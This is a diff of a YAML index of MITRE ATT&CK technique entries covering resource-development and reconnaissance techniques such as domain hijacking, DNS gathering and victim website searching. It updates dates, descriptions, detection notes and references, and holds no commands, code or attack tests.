-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -65844,21 +66478,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -65898,7 +66568,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -65917,15 +66587,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -65933,19 +66601,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -65979,55 +66647,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -66052,7 +66729,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -66068,8 +66745,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
@@ -66091,7 +66766,7 @@ reconnaissance:
         url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
         description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
           73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:44:43.900Z'
       name: Purchase Technical Data
       description: |-
         Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -66107,8 +66782,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.005:
     technique:
@@ -66136,7 +66809,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:05.302Z'
       name: IP Addresses
       description: |-
         Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -66152,33 +66825,33 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.002:
     technique:
-      modified: '2022-10-21T14:32:48.393Z'
+      modified: '2024-11-11T16:13:02.196Z'
       name: DNS
       description: |-
-        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+        Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
 
         Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
       created: '2020-10-02T15:47:10.102Z'
@@ -66192,18 +66865,29 @@ reconnaissance:
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
         url: https://www.circl.lu/services/passive-dns/
+      - source_name: DNS-CISA
+        description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+          Leak Domain Information. Retrieved June 5, 2024.
+        url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
       - source_name: DNS Dumpster
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
         url: https://dnsdumpster.com/
+      - source_name: Alexa-dns
+        description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+          June 5, 2024.
+        url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
       - source_name: Sean Metcalf Twitter DNS Records
         description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
-          May 27, 2022.
-        url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+          September 12, 2024.
+        url: https://x.com/PyroTek3/status/1126487227712921600
+      - source_name: Trails-DNS
+        description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+          the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+        url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.002:
     technique:
@@ -66224,7 +66908,7 @@ reconnaissance:
       - source_name: WHOIS
         url: https://www.whois.net/
         description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:50:44.113Z'
       name: WHOIS
       description: |-
         Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -66240,39 +66924,37 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1594:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
-      type: attack-pattern
-      created: '2020-10-02T16:51:50.306Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1594
-        url: https://attack.mitre.org/techniques/T1594
-      - source_name: Comparitech Leak
-        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
-        description: Bischoff, P. (2020, October 15). Broadvoice database of more
-          than 350 million customer records exposed online. Retrieved October 20,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-02T18:52:21.278Z'
       name: Search Victim-Owned Websites
-      description: |-
-        Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
-        Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+      description: "Adversaries may search websites owned by the victim for information
+        that can be used during targeting. Victim-owned websites may contain a variety
+        of details, including names of departments/divisions, physical locations,
+        and data about key employees such as names, roles, and contact info (ex: [Email
+        Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+        also have details highlighting business operations and relationships.(Citation:
+        Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+        actionable information. Information from these sources may reveal opportunities
+        for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+        or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+        establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+        or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+        initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+        or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+        to manually browsing the website, adversaries may attempt to identify hidden
+        directories or files that could contain additional sensitive information or
+        vulnerable functionality. They may do this through automated activities such
+        as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+        well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+        Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - James P Callahan, Professional Paranoid
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for suspicious network traffic that could be indicative
         of adversary reconnaissance, such as rapid successions of requests indicative
         of web crawling and/or large quantities of requests originating from a single
@@ -66280,13 +66962,41 @@ reconnaissance:
         Analyzing web metadata may also reveal artifacts that can be attributed to
         potentially malicious activity, such as referer or user-agent string HTTP/S
         fields.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+      created: '2020-10-02T16:51:50.306Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1594
+        external_id: T1594
+      - source_name: Perez Sitemap XML 2023
+        description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+          to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+          2024.
+        url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+      - source_name: Comparitech Leak
+        description: Bischoff, P. (2020, October 15). Broadvoice database of more
+          than 350 million customer records exposed online. Retrieved October 20,
+          2020.
+        url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+      - source_name: Register Robots TXT 2015
+        description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+          you don't want them to look. Retrieved July 18, 2024.
+        url: https://www.theregister.com/2015/05/19/robotstxt/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.001:
     technique:
@@ -66311,7 +67021,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:13.409Z'
       name: DNS/Passive DNS
       description: |-
         Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -66327,8 +67037,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.003:
     technique:
@@ -66350,7 +67058,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:38:31.983Z'
       name: Identify Business Tempo
       description: |-
         Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -66366,8 +67074,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
